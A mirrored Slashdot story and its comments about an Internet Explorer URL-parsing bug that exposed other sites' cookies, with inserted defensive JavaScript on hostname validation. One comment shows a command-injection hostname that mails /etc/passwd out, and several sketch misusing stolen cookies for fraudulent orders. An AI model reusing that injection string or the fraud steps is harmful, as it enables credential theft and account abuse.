Slashdot Mirror


MSIE's Cookies Are Public

If you're using Microsoft Internet Explorer running on Microsoft Windows, turn off Javascript now. Your cookie file is readable by any hostile website. Or, if you'd like to see the security hole in action, leave Javascript on and check it out: "Open Cookie Jar."

Peacefire webmaster Bennett Haselton is on a roll. After discovering yesterday's Hotmail hole, today he's published his discovery that MSIE's Javascript contains a bug that allows any hostile website to obtain your cookies.

Essentially the bug is that MSIE's Javascript is not very smart about determining which domain you're coming from. If the URL you're looking at has its "/" characters replaced by the hex representation "%2f", it can be fooled into thinking your path is actually a very long machine name. Because it interprets that path wrongly, a well-placed ".yahoo.com" in the URL can make Javascript think it should be using Yahoo's cookies - and Javascript can be told to deliver those cookies back to the hostile server.
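The mismatch described above can be modelled as two URL readers that disagree about where the host ends, next to a check that refuses such URLs. This is an added example, not code from Peacefire, Microsoft or the original demonstration; the function names and the `.example` hosts are constructed, and the split into a "decoding" reader and a "raw" reader is an assumption drawn from the article's description.

```javascript
// Added illustration. All names and sample URLs are constructed.

const SCHEME = /^[a-z][a-z0-9+.-]*:\/\//i;

// Reader A (models the component that picks the machine to contact):
// it percent-decodes first, so "%2f" has already become "/" when the
// authority is cut at the first "/", "?" or "#".
function hostAfterDecoding(url) {
  let rest;
  try {
    rest = decodeURIComponent(url.replace(SCHEME, ""));
  } catch (e) {
    return null; // malformed percent-escape
  }
  return rest.split(/[\/?#]/)[0].toLowerCase();
}

// Reader B (models the component that decides whose cookies apply):
// it cuts the authority out of the raw URL, so "%2f" stays inside it.
function hostFromRawAuthority(url) {
  return url.replace(SCHEME, "").split(/[\/?#]/)[0].toLowerCase();
}

// Cookie domain test: exact match, or suffix match on a label boundary.
function domainMatches(host, cookieDomain) {
  const d = cookieDomain.replace(/^\./, "").toLowerCase();
  return host === d || host.endsWith("." + d);
}

// Summary of how the two readers see one URL.
function inspect(url) {
  const connectsTo = hostAfterDecoding(url);
  const cookieScope = hostFromRawAuthority(url);
  return { connectsTo, cookieScope, disagree: connectsTo !== cookieScope };
}

// Hardened path: parse once, and accept the result only if it is a plain
// DNS hostname (letters, digits, hyphens, dots). "%", "=", "@" and
// whitespace all fail the pattern, so an encoded path never counts as a host.
const HOSTNAME =
  /^(?=.{1,253}$)[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?(\.[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?)*$/;

function strictHost(url) {
  const host = hostFromRawAuthority(url).replace(/:\d+$/, ""); // drop port
  return HOSTNAME.test(host) ? host : null;
}

// Cookies for cookieDomain are exposed only to a URL whose single,
// validated host falls inside that domain.
function cookieAllowed(url, cookieDomain) {
  const host = strictHost(url);
  return host !== null && domainMatches(host, cookieDomain);
}
```
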

Bennett and I believe the bug is confined to the Javascript code in MSIE, but we have not done extensive testing to determine this. For now, at least, we believe turning off Javascript will be sufficient to eliminate this security hole.

Or, you could migrate to another browser or operating system...

We have only tested this with IE 5, and Windows 95/98. Reports of success or failure with other versions would be welcome.

After Bennett explained to me how this works, I wrote a short CGI script to demonstrate what lurks in cookie files. Instead of silently stealing your private information and squirreling it away for later use, it echoes that information back to you (and then forgets it, of course). Updated: That script has been rewritten by and is now hosted at securityspace.com. For best results, first go log into amazon.com, type your zip code into hollywood.com, and visit playboy.com. Then go visit securityspace's general info page and click the "click here."

Newsbytes and CNET have picked up this story and have good writeups.

241 comments

  1. And then there's this... by CloneRanger · · Score: 1

    In the face of a government ordered breakup of Microsoft due to anti-competitive measures, Microsoft is doing it again. Microsoft has released the Internet Explorer 5.5 beta recently in order to solicit feedback. One of the new features in IE 5.5 is the integration of the MSN Messenger Service and Outlook Express. There doesn't seem to be a way to turn it off or to replace it with a competing Messaging Service such as ICQ or the AOL Instant Messaging service. I think we should give them some feedback.

  2. IE 5.5 beta is affected by blacksmith · · Score: 1

    IE 5.5 beta on win2k doesn't fix anything - it still works fine.

  3. 1 click shopping (Re:And the paranoids...) by Punto · · Score: 1
    Therefore if I can steal the session ID for lets say Amazon I could send you $20000 dollars of books as a joke. That is not funny.

    Of course it's funny.. you could use that _stupid_ "1 click shopping" with someone else's ID.. It'll be easy, fast, _and_ funny..

    (of course, I think it's funny because I use Netscape..)

    --
    Stay tuned for some shock and awe coming right up after this messages!

  4. IE4 too by pod · · Score: 1

    Ditto for IE4 on NT4 (all patched up).

    --
    "Hot lesbian witches! It's fucking genius!"
  5. Re:ok, differentiate for me by Black+Parrot · · Score: 2

    > what is M$ bashing FUD and what is a valid opinion?

    What really matters is, how long until a fix is out, and what other problems will the fix introduce?

    --
    Sheesh, evil *and* a jerk. -- Jade
  6. Who wants to make someone lose all their karma? by redback · · Score: 1

    the first thing i did to test this was to log into slashdot with ie (i dont use ie, but its there) and check out my /. cookie, and i noticed that the user number is stored in plaintext (look harder its there) so in theory one could change it and troll with someones karma!

    havent tried this though

  7. Re:Has Peacefire reported this to MS? by RayChuang · · Score: 2

    A quick update: I did a "cut and paste" of the statement made by peacefire.org here on Slashdot and have sent it on to Microsoft's Security team as a high-priority mail message.

    --
    Raymond in Mountain View, CA
  8. This has been around for awhile by Once&FutureRocketman · · Score: 1

    This bug has been known for at least a year and a half. Check this out.


    --

    "Research is what I am doing when I don't know what I am doing." -- Wernher von Braun

  9. Apparently not true by Bob-K · · Score: 2

    A post on the NTBugTraq list calls this story a "hoax". Perhaps that's overstating it, but it's a good example of the danger of jumping to conclusions.

    The poster says that the demonstration script uses document.write to display the contents of a cookie in the browser window. Nowhere is it explained how the information might be transmitted back to the server.

    I haven't investigated the code myself, just passing along the comments of others.

  10. Re:Oh no!! by Sloppy · · Score: 1

    Mail it to your hotmail account. It will be perfectly safe there.


    ---
    --
    As copyright owner of this comment, I authorize everyone to defeat any technological measure which limits access to it.
  11. Re:uh, I think yes by mcc · · Score: 2

    you're forgetting about "gift shipments".

    step 1: get person's cookie file
    step 2: sign onto ecommerce service as person
    step 3: change the person's default email address with the service to a hotmail account (so they won't notice the "item has been shipped" thing)
    step 4: mail something, as a "gift", to a P.O. box. they will let you do this.

    If you get lucky no one will notice. Scarily enough, this would work.

  12. Re:The other problem by jesser · · Score: 2
    I also posted something on that article that got lost in the shuffle: a link to an old slashdot article about a CERT advisory. Among other things, the advisory asked webmasters to escape/reject all html coming from site users, even if only that one user sees the content.

    Open-source webserver Apache fixed its 404 not found page to escape the name of the URL, but most dynamic websites still haven't fixed all of their code.

    Coincidentally, I had just been reporting a bunch of bugs about bugzilla (mozilla's bug-tracking system) not being careful with untrusted data when these slashdot articles come up. I'm actually more worried about attacks against mozilla's CVS system than against its bug-tracking system, but I haven't looked for bugs there yet.

    --
    The shareholder is always right.
  13. DUH! by Marc+Slemko · · Score: 1

    Umh... if you are running arbitrary javascript that can display the cookie, then it doesn't take any genius to figure out how to send it somewhere! Like... load a URL on the attacker's server (or a free throwaway account) containing the value of the cookie.

  14. Good manuscript for a movie? by Slackadder · · Score: 1

    Microsoft's style of inventing, copyrights, market domination, "care" for customers and all the other nice stories they give us would be a good manuscript for making one of these bad Hollywood movies about internet, hackers and big bad companies and all the other "scary things" they are having in these movies. At least this movie will have some relevance, because it has really happened.

    In 10 years everyone will be laughing at Microsoft's infantile, stupid inventions and copyrights.

    With so many bugs, security holes and stupid copyrights, Microsoft is making fools of themselves. How much can IT-managers take before they turn to someone else? If that happens ./ users can start doing something more useful than complaining about software they are not using (ARE YOU???), more than they have to. Maybe it won't be that amusing though...

  15. Re:Virtual hosting and other problems for Apache by RayChuang · · Score: 2

    If this is occurring even on Apache, then we may have a MAJOR security problem here.

    This could indicate that Javascript (or ECMA-242 script as it's sometimes known) in general can cause a security leak. They better start testing this on Netscape Navigator 3.x and all Netscape Communicator versions NOW to see if Netscape is also vulnerable to this bug.

    --
    Raymond in Mountain View, CA
  16. Re:uh, I think yes by Marc+Slemko · · Score: 1

    Sure, maybe it will work on some sites. But that is due to other holes that they have. Try it on amazon.com. You won't get far, since they require you enter your password to do that.

  17. You too can be a best selling author by Camel+Pilot · · Score: 4

    Heres How...

    1. Write book ( Something catchy and trendy ie. "Whats good for MS is good for America" ).

    2. Build a website to promote your book.

    3. Scan for BN and Amazon cookies from those who visit your site.

    4. Build a LWP Perl script and batch order copies of your book to those fools who visit your site with cookies enabled.

    5. Collect your royalties and move offshore.

  18. Re:Uh Oh by ThesickAlienx · · Score: 1

    I am not an advocate for MSIE, or even Netscape both are suck browsers...
    However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldn't even work without the damn cookies?

    I am sick of cookie bashers, however. Busting out all kinds of hysteria and privacy garbage. There is a bad side to every method. Including secure transactions. Why not just say it like it is for a lot of crucial technologies on the net? why not state: "Did you know that every time you do a secure transaction you run a risk of a third party listening and taking your credit card number?" How about we just do a loud campaign that preaches to the world that their pocketbook can be stolen if they use the web! Let's really shoot our foot boys!

    If every one knew just how unsafe secure transactions are on the net, we would all be in a lot of trouble, and possibly out of work in the long run.

    Nothing is fail proof, or impossible to breach in our web medium... You should all know that by now.

    Keep in mind As a developer sometimes there is only one way to go for a solution.. Technology will change and maybe get better but it wont ever stop the real "hardcore coder". Politics are at large and for now the powers that be are actually in our favor. So lets try and be "Nice" about what we do and say within our medium.

    The Alienx

  19. Call the repairman by TopShelf · · Score: 1

    your sarcasm detector seems to be on the fritz...

    --
    Stop by my site where I write about ERP systems & more
  20. Impossible by Legion303 · · Score: 1
    A truck-sized security hole in a Microsoft product? I won't believe that until I see it. Oh, wait...

    -Legion

  21. This is Illegal. by Domini · · Score: 1

    Please remove this exploit of Microsoft from slashdot, Microsoft would rather only let the dangerous criminals know of this, and not their general user base....
    :)

  22. Re:WRONG! by TomV · · Score: 1
    That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook

    This is not relevant to anything. If you built Slackware when it first appeared, and never installed any patches since then, then
    1 - you have a 'default install of Slackware', and
    2 - you've got more vulnerabilities than you've had hot dinners.

    Failure to patch is not a failure of a given OS, it's a PEBCAK.

    Go to www.microsoft.com, click on Subscribe from the blue bar near the top, and subscribe to the alerting services.

    MS is far from perfect, but failure to automagically patch exploits that don't yet exist is not a valid line of attack against anyone

    TomV

  23. Re:And the paranoids rejoice!! by gss · · Score: 1

    someone could steal your slashdot.org cookie and wipe out all your karma by troll posting! :)

  24. Re:UNIX _IS_ effected by divec · · Score: 1
    I just tried the test with IE 5 for Solaris

    I didn't know there was an IE 5 for Solaris - is it better than IE3 for Solaris was?
    --

    perl -e 'fork||print for split//,"hahahaha"'

  25. Re:A potential sploit by dragonfly_blue · · Score: 1
    It's people like you that spoil perfectly good software patents for the rest of us! You outta be ashamed of yourself!

    =P

    --
    Free music from Jack Merlot.
  26. Proxies protect? by Pseudonymus+Bosch · · Score: 2

    I have tried the demo by Jamie (go to Hollywood, etc.) and then a window opens with many frames. All contain "ERROR 205 -- DNS name lookup failure. Please contact your system administrator." from the proxy but for http://www.securityspace.com%2fexploit%2fexploit_1e.html%3fa=.hollywood.com/ that has a Hollywood.com window saying "That user doesn't exist".

    When I tried the box and button on Security space, I get "www.slashdot.org's cookie is:".

    I run IE 4.0 in NT and have Junkbuster set to allow cookies only to sites I trust.
    I also have a company proxy to access the web.

    __

    --
    __
    Men with no respect for life must never be allowed to control the ultimate instruments of death.
    GW Bu
  27. ActiveCookie Technology (tm) ? by lpontiac · · Score: 1
    I can see this happening sooner or later.

    Just watch out, because in the distant future, you may bite down on a cookie and find a worm...

  28. Paranoia by mbell · · Score: 1

    I just tested this with Windows 2000 running IE5. I saw my cookies from many web sites in a split second. This is sorta scary, but I'm really not so worried about it that I'll turn off javascript. If I did turn off javascript, it would break many sites that I frequent.

    Sure, there could be some malicious code to steal cookies from me, but the chances are extremely small. First, the attacker would have to know what sites I have cookies from on my computer. Even if it did find those cookies, what is the worst it could do? Steal your hotmail account? (I'm sure they couldn't do THAT already). If you use cookies to keep track of really sensitive data, then it's your own damn fault.

    So, I'm not turning off javascript, and I'm sure MS will release some patch in a few days fixing this 'feature' of windows and ie.

    -Mike Bell

  29. No you don't :) by spiralx · · Score: 2

    The "hidden" troll forum is currently up to about post #2100, and all of them are genuine posts rather than bot-generated. So you still come in second with about 800 posts :)

  30. Re:And the paranoids rejoice!! by Sorklin · · Score: 1

    Are you Bob Gobman of Anytown, USA? I'm John Smith! I live down on Peppermint Lane. We ought to get together some time for a phosphate.

  31. Really? by Pseudonymus+Bosch · · Score: 1

    I haven't tried but I guess that it doesn't allow untrusted sites access to cookies. But what if a trusted site uses this exploit to access cookies from another trusted site?

    I am confused.
    __

    --
    __
    Men with no respect for life must never be allowed to control the ultimate instruments of death.
    GW Bu
    1. Re:Really? by Kris_J · · Score: 2
      The default installation does not touch cookies, but it does have some wicked javascript filters. Sure, I get "errors", but I also avoid rollovers, popups and other annoying javascript cluelessness.

      It's totally configurable, you can design any filters you want - but I'm so happy with the default that I just leave it at that. (particularly I like the agent and referer masking.)

  32. Re:And the paranoids rejoice!! by Bad+Mojo · · Score: 1

    When it comes to Karma on Slashdot, it's the getting, not the having that matters. ;)


    Bad Mojo

    --
    Bad Mojo
    "If you can't win by reason, go for volume." -- Calvin
  33. Re:Asking for Trouble by dragonfly_blue · · Score: 1
    Apparently, even the shiny new servers can't handle a direct blast from the death star.

    --
    Free music from Jack Merlot.
  34. Re:And the paranoids rejoice!! by divec · · Score: 1
    let Bob Gobman at 1 Happy St. get all the junk mail destined for me.

    Yeah, I often wonder how much crap does get sent to The Queen, Buckingham Palace. It must be really annoying for her. (And of course she opens all her own mail, yeah)


    if you are THAT paranoid about common public information, then DON'T POST YOUR REAL DATA!!!

    That's all very well, but I don't want Bob Gobman to get my copy of "GTK+/GNOME Application Development".
    --

    perl -e 'fork||print for split//,"hahahaha"'

  35. Configuration problem by lovebyte · · Score: 2
    Typing this URL
    http://somewhere.com/%2ftest.php3?q=8
    replaces the %2f with a / on my apache server. That's all. I guess there is a problem with your apache configuration. Since you seem to be called Jonathan Clark and the URL apache returns for you contains /jc/, I guess that you have configured apache to go to your jc directory when the URL http://somewhere.com// is used. Just a guess.

    --

    I'll do it for cheesy poofs.

    1. Re:Configuration problem by jonathanclark · · Score: 2

      er.. the /jc/ was a typo on my part - it shouldn't be there.

      As the other poster commented this isn't really a problem with apache, it's IE's fault. IE thinks the hostname from the URL includes the %2f %3f characters - and it's passing this to apache in the request header. What I thought was interesting is the fact that apache unescaped the string. This means that there might be security holes in CGI scripts that expect hostname strings to be safe.

      For example if the unescaped hostname looks like this:

      somewhere.com;`mail s@s.com /etc/passwd`

      and some CGI script does something like this:

      nslookup $HOSTNAME

      you've got a big problem!
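One way to treat the Host header as untrusted input before it goes anywhere near a subprocess, as the comment above warns. This is an added example, not code from Apache or from any poster; the function names are constructed, and it assumes the lookup runs through an API that takes an argument vector and starts no shell (Node's `child_process.execFile` is one such API).

```javascript
// Added illustration. Function names are constructed for this example.

// One DNS label: letters, digits, hyphens; no leading or trailing hyphen.
const LABEL = /^[a-z0-9]([a-z0-9-]{0,61}[a-z0-9])?$/;

// Parse a Host request header of the form "host" or "host:port".
// No percent-decoding is applied: a "%" in the value is simply invalid.
// IPv6 literals are out of scope here and are rejected.
// Returns { host, port } or null.
function parseHostHeader(value) {
  if (typeof value !== "string" || value.length === 0 || value.length > 260) {
    return null;
  }
  const m = /^([^:]+)(?::(\d{1,5}))?$/.exec(value.trim().toLowerCase());
  if (m === null) return null;

  const host = m[1].replace(/\.$/, ""); // tolerate one trailing dot
  if (host.length === 0 || host.length > 253) return null;

  // Every label must be plain LDH. This rejects ";", "`", "$", spaces,
  // "/", "%" and also a leading "-" that a tool could read as an option.
  if (!host.split(".").every((label) => LABEL.test(label))) return null;

  const port = m[2] === undefined ? null : Number(m[2]);
  if (port !== null && (port < 1 || port > 65535)) return null;

  return { host, port };
}

// Build the argument vector for the lookup. The hostname is one array
// element handed to the program as-is, so no shell ever interprets it.
function lookupArgv(hostHeader) {
  const parsed = parseHostHeader(hostHeader);
  if (parsed === null) {
    throw new Error("rejected Host header");
  }
  return ["nslookup", parsed.host];
}
```
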

    2. Re:Configuration problem by Ben+Hutchings · · Score: 1

      No, IE is correct to do this. This is exactly what the %-sign is for - escaping characters that have special meanings. For instance, a Mac web server could have a slash in its filenames, and you would have to write this slash as %2F in the URL for that file so that it isn't interpreted as a directory separator. (Of course, there's no real use for this when it comes to hostnames.) But it should pass exactly the same host string to the resolver, and yet it appears not to have done so. This, I think, is the real bug that leads to this security hole.

  36. Re:Microsoft Bugs: Not Just For Windows Anymore by frankie · · Score: 1
    If anyone actually uses this on HP or Solaris (or Mac?) you may want to check the referred-to test pages

    IE 5 Mac is immune as far as I can tell, but it's not from the same code base as IE Win.

    By the way, M$ bugs have been affecting Macs for a while now -- Macro viruses.

  37. The website (Slashdot) should refuse the GET method by cyberdonny · · Score: 1

    This attack only works because Slashdot accepts comments submitted using the GET method, rather than POST, which is normally used for forms. This is a very common error unfortunately... Let's just hope that stock trading sites such as E*Trade are more careful about which methods they accept for their forms, or else somebody could abuse this to perform the mother of all stock manipulations. Conceivably, such a poisoned link could be hidden in a < img src="..."> tag, and nobody would even notice...

  38. Re:turning off one-click is not safe... by biafra · · Score: 1
    mikemulvaney wrote
    The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough.

    Very simple solution to that one....
    bash: ln -s /dev/null ~/.netscape/cookies
    This way cookies are stored in memory for the life of the browser session, and sent to the bit bucket when you close netscape. Of course this assumes that you are using NS under some sort of *NIX.

    --
    :wq
  39. no major virtual host problems. by Marc+Slemko · · Score: 1

    What are you talking about? "javascript in general can cause a security leak"? Huh? You don't make any sense. This has nothing to do with "javascript in general" and is 100% an IE implementation bug.

    The only bug here is that you can make IE make requests with a Host: header that doesn't really resolve to the machine in question. So sure, there is some risk of cookies being exposed to the default vhost on a server when they should only be sent to a particular vhost, but that is a comparatively tiny risk.

    But Navigator has a far bigger problem (allowing you to embed CRs and LFs within HTTP requests) that lets you do this or more. I posted about this some time ago on bugtraq. Unfortunately, Netscape doesn't give a damn. If you are looking at response to security issues, no matter how bad MS is, Netscape is 100 times worse. Combine a company with no direction and not much in the way of a production plan with most clueful employees having bailed out, with the remaining ones just not giving a damn... and that is what you get.

  40. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  41. Re:Microsoft Bugs: Not Just For Windows Anymore by oh6062 · · Score: 1

    The bug certainly doesn't affect my OS8.6 Mac running IE5, but (obviously) it works in IE5 in Virtual PC 3.

    God, I hate Microsoft. They have feature sets I find really useful that other apps can only dream of (Office 98 vs Appleworks 6...), and then they screw it all up with these bugs... Aaarrgghhhhh!!!

    --
    - Oliver. "exp(i*Pi)+1=0" - Euler
  42. Comment removed by account_deleted · · Score: 2

    Comment removed based on user account deletion

  43. turning off one-click is not safe... by mikemulvaney · · Score: 1

    Even if you turn off one-click, the person who stole your cookies can just turn it back on.

    The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough.

    I am aware that Opera has this feature.

    Mike

    1. Re:turning off one-click is not safe... by Frank+T.+Lofaro+Jr. · · Score: 1

      Here's how to have cookies not persist beyond the end of a session when using Netscape under Windows NT.

      attrib +r "c:\Program Files\Netscape\Users\YourProfile\cookies.txt"

      (using the actual path on your machine, of course).

      You can use attrib -r to undo it. Like store your slashdot cookies by having it writable when you log in, then make it read only again. Very useful.

      --
      Just because it CAN be done, doesn't mean it should!
    2. Re:turning off one-click is not safe... by mantis_p · · Score: 1

      "The #1 feature I want in a browser is a check box that says "Delete all cookies when quitting browser". Actually, I would really love more fine-grained control, but just this one feature would be enough."

      You should try installing something like GuardDog. It allows you to review all of the cookies placed on your machine when you close your browser and lets you delete certain ones or delete all of them. It is pretty killer. I love it.

      ~m(antis)

    3. Re:turning off one-click is not safe... by Marc+Slemko · · Score: 1

      Take a look at amazon's site. You can not enable one click ordering without knowing your password. You also can't do most account related things without knowing your password. This is done by Amazon on purpose.

      Now, they _did_ have some pretty gaping bugs in this area a few months ago that let you bypass this. I pestered them enough and they eventually fixed them though.

      Also note that one click ordering really isn't all that dangerous. It is more of an inconvenience. So what is the worst that can happen? You can get some item sent to you that you have the hassle of returning. You can't send it to a different address. You can't obtain the credit card info. etc.

  44. Re:M$ caught in the cookie jar? again?! by B'Trey · · Score: 1
    Can someone explain this to me? I'm running Windows 2000, using IE 5.00.2920.0000. I'm also running Junkbuster. Going to http://www.holocaust-history.org/~jamie/iecookies/test.cgi, I get this result:

    This exploit only works on Microsoft Internet Explorer running on Microsoft Windows. Your user-agent is Mozilla/3.01Gold (Macintosh; I; 68K), so you would not be affected.

    I can understand that Junkbuster, blocking cookies, might prevent the exploit from working, but I don't understand why the site thinks I'm running Mozilla on a Mac?!?!?

    --

    "The legitimate powers of government extend only to such acts as are injurious to others." Thomas Jefferson.

  45. Not Jesse, but Linux! by nevets · · Score: 1

    A user's Playboy.com cookie stores the fact that the user has visited Playboy.com -- which not every Playboy visitor would want the whole world to know. (Yeah, we know, you just wanted to read the Jesse Ventura interview)

    Actually, I wanted read the articles about Linux.

    Steven Rostedt

    --
    Steven Rostedt
    -- Nevermind
  46. Re:Wish I could red the linked article by Alanzilla · · Score: 2

    I would quit my job immediately if my employer installed filtering software. For God's sake, why would an employer want to forbid their employees from educating themselves?

    It's mostly to stop the idiots in sales from surfing for pr0n.

  47. How to Break Up M$ by markwild · · Score: 1

    Just my two cents on the Microsoft Breakup. . . I can't help but think that John Dvorak had the right idea when he said that the way to break up M$ is to split them down the middle. Just like in sandlot baseball, Steve Ballmer and Bill Gates will be team captains, then choose employees from each division right down the middle. They'll each have their own company: M$ Red will be Gates', and M$ Blue will be Ballmer's. Now, LET THESE TWO COMPANIES COMPETE WITH EACH OTHER. You wanna see some real competition? You wanna see some real innovation? You wanna see some less buggy products coming out of Redmond (or Bluemond)?? Split 'em in two and let them have at it!!

  48. Uh Oh by finkployd · · Score: 4

    Revealing proprietary, trade secrets on a public web site? Let's face it, this is MS, there is no way this is a security hole, they are too "innovative" for that kind of sloppy work to get through. This must be a special "enhancement" they made to the way javascript works, and as such, is covered under the DMCA.

    I'll bet it's another letter for you guys :)

    Finkployd

    1. Re:Uh Oh by gilroy · · Score: 2
      Quoth the poster:
      However cookies are an integral part ("standard") of a browser. In fact did you know that the services at Hotmail, and Amazon (one click shop) wouldnt even work without the damn cookies?
      Yet another reason I don't use Amazon.com anymore. Sites that use cookies need to be explicit about why and how, and then the user could (grudgingly) allow certain ones, from trusted sites, to be set. I complained not long ago to staples.com, and actually received a response indicating that the privacy concerns are forcing them to re-think their requirement of cookies. Maybe there's more hostility than we thought...

      Also quoth the poster:

      There is a bad side to every method. Including secure transactions.
      But you can choose methods that minimize the "bad side" and make it hard to exploit, rather than (as here) relatively easy.

      And yet more from the poster:

      If every one knew just how unsafe secure transactions are on the net, we would all be in alot of trouble, and possibly out of work in the long run.
      Does your personal code of ethics really say that you should keep quiet about known dangers because it might affect your earning potential? How ruthlessly pragmatic! Or... we can raise a ruckus over these sorts of too-simple exploits and, through the glare of publicity, perhaps encourage the people involved to design better products.
    2. Re:Uh Oh by ThesickAlienx · · Score: 1

      To best describe my personal code of ethics read on: "As builders and developers, we know the threats to security, and we constantly work for better security on systems." It's the idea of publicising and making problems utterly public that can prove to be dangerous. Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.

    3. Re:Uh Oh by gilroy · · Score: 2
      Quoth the poster:
      Take for example the recent love bug. One came out then 20 more were made over night. Maybe many more would have been made if we went and put the source code on a highly visible site.
      Or maybe, if the Outlook code were open-sourced, overnight a fix and patch would have been developed and distributed... in fact, if the Outlook code were open-sourced, maybe the bug would have been found and fixed before it allowed hundreds of millions of dollars to be lost to productivity shutdowns...
    4. Re:Uh Oh by MicroBerto · · Score: 1
      Haha.. It seems that Microsoft has been taking HIT AFTER HIT from everyone.... and i LOVE it!

      How long is it going to take the public to realize who's the peoples' king, and who's the oppressor? I hope the good news keeps on comin in.

      Mike Roberto (roberto@soul.apk.net) -GAIM: MicroBerto

      --
      Berto
  49. Re:WRONG! by qnonsense · · Score: 1

    That's because you installed the Outlook fix after the Melissa virus came out. You do NOT have a default install of Outlook. The default install of Outlook runs the script just by VIEWING the email.

    --
    There comes a time in every man's life when he must say, "No mother! I do not want any more Jell-O!"
  50. Just Wondering by arthurs_sidekick · · Score: 2

    ... whether peacefire.org is going to get threatened by Microsoft under the DMCA for releasing these "trade secrets" ?

    OK, here ends the simple "anti-MS" part of the post (fun though it was for me). Please, folks, let's just look at this as simply a data point and a public-service announcement. Yes, it's a hole in IE; it's a safe bet that every significant piece of software's got holes.

    Let's see how fast MS is able to get a patch out; this one's big enough for them to really worry.

    --
    "Oh, I hope he doesn't give us halyatchkies," said Heinrich.
  51. on cookies and security by Marc+Slemko · · Score: 1

    Cookies are not secure and will never be secure.

    First, ignore all the silly ranting about not being encrypted, etc. That has nothing to do with the issue. You can send cookies over SSL connections. You can set cookies that will only be sent over a SSL connection. etc. This type of cookie stealing problem is far easier to exploit than having to compromise the network over which traffic is flowing. That is a completely different attack that allows you to do a whole lot more than just steal cookies.

    This particular vulnerability isn't actually all that "serious" in terms of new exposure. Lets look at the examples given on the page describing the exploit. hotmail, yahoo mail, amazon.com, etc... cookies for all those sites, and probably for every other site listed, are stealable anyway due to the so-called "cross site scripting" issue.

    I have spent a lot of time with these issues and related ones over the past few months. By their very nature, cookies are not treated as confidential by the browser and are far too accessible. The only way to get rid of the problems that using cookies for authentication or private information have is to replace them with a mechanism that is designed from the ground up to protect that information.

    Unfortunately, from the perspective of a web site creator, there are very very limited alternatives. HTTP basic authentication has its own problems, using SSL client side certificates has its own problems, MD5 digest auth has its own problems, etc. There is no current method that avoids all, or even most of, the problems. All you can do is manage your risk.

    Some day I plan to write a document describing the various risks associated with authentication schemes and what can be done to minimize them, but that takes time...

  52. This is not new... by Anonymous+Elf · · Score: 1

    As a young elfing, I've always had to defend my cookies from hordes of thieves, trolls, and ne'er-do-wells. If you don't protect your cookies, they will be stolen.

  53. Hilarious! by Anonymous+Shepherd · · Score: 2

    ROTFLMAO

    OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

    It makes the Internet all that much closer to you, as well as your machine: in both directions.

    Well, maybe the above thought is incorrect.

    Anyway, I'm thinking something blasphemous. M$ complains that splitting it up will hinder its ability to 'innovate' and 'compete'. Isn't that the point? If M$ can't expect to release a decent Office or X-Box or IE without access to the OS group, how is Netscape, or Corel, or anyone else expected to 'innovate' and 'compete' if M$ cannot?

    There are people complaining about how breaking up M$ is bad, but I'm wondering, if M$ restructures itself in such a way that the OS department can still freely communicate with the Apps department, but in a way that is public and open, doesn't *everyone* win?

    -AS

    --

    -AS
    *Pikachu*
    1. Re:Hilarious! by MrHat · · Score: 2

      ROTFLMAO. OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'.

      If you really want to die of laughter, check out Time's latest piece, which includes a "viewpoint" by Mr. Gates, defending the very integration you speak of.

      My personal favorite from Gates: "Updates to Windows and Office technologies that could, for example, protect against attacks such as the Love Bug virus would also be much harder for computer users to obtain."


      43rd Law of Computing: Anything that can go wr

    2. Re:Hilarious! by Oarboat_7 · · Score: 1

      Corel can't even write native Linux code of their bigger products. Instead, they're dragging Windows (wine) along with their apps onto Linux. Similar, of course, to what Microsoft did to get IE on Unix systems.

      Netscape hasn't been that bad. At least they port to many OSes.

    3. Re:Hilarious! by Sabalon · · Score: 1

      OMG. I just can't help thinking 'This is the value of M$'s integration with the OS'

      This makes no sense. Even if it were not integrated with the OS and was a freestanding app, this hole would still be present.

      I don't agree with the breakup, however, the open communicae between the OS and APPS would help.

  54. Re:oh give me a break by ichthus · · Score: 1

    I'm sure Microsoft will patch this hole soon. And yes, Slashdotters are critical of Microsoft. But come on. Melissa, ILOVEYOU, etc. THIS IS A SECURITY BUG, the only fix for which has been to 'educate users not to run executable attachments.' This is a bunch of crap. Where's the REAL fix? Where's Microsoft's patch for this? Melissa would still be just as devastating today.

    Automobile manufacturers don't just rely on driver education to increase vehicle safety. They install seatbelts, airbags, door-beams, etc. because lives are at stake. Likewise, Microsoft needs to revise its product. $Billions are at stake, not to mention privacy.

    You may be tired of the Slashdot/Linux community's critical attitude toward Microsoft. I'm sick of Microsoft's cavalier attitude toward security and reliability.

    --
    sig: sauer
  55. Look Ma! Another Microsoft Innovation! by Alien54 · · Score: 2

    I am just trying to think of how Micro$oft marketing will try to explain this as a feature....

    --
    "It is a greater offense to steal men's labor, than their clothes"
  56. Could a breakup help by FoulBeard · · Score: 2
    Ahem..Crash Me, Melissa, ILoveYou, Hotmail, now this. Leave it to Microsoft to bring innovative new ways to lose all sense of privacy. Seriously though maybe this is an artifact of M$ getting too big? I am a pretty forgiving guy, but they are making too many mistakes for even me to overlook.

    Maybe a breakup is a good thing. It's about time that Microsoft re-discovers the meaning of the words, pride.. integrity.. fun.. innovation.. excellence. Instead of their usual fare which consists of market capitalization, share value, PR, equity.

    Microsoft has a lot of good people working for them, and I have had the pleasure of working with some of them. Too bad the company's sense of responsibility, and integrity is off smoking a $3 sack of crack.

    My humble opinion.....
    -Nathan

  57. Re:And the paranoids rejoice!! by Anonymous Coward · · Score: 1

    So...you don't want to purchase that car because it has bad brakes?????

    OH GOSH..why can't you just drive on the back roads and never go over 20 MPH... or are you in THAT much of a hurry?????? I never go over 15 mph and I've never had any problems stopping my car.

    Is it just me or do people find reasons to get all up in arms for nothing. For all of you who will respond that this is a big deal, remember nobody is FORCING you to drive at speeds over 15 mph, so there is no reason to ever worry about having bad brakes on your car.

  58. cookies were NEVER secure by consumer · · Score: 3

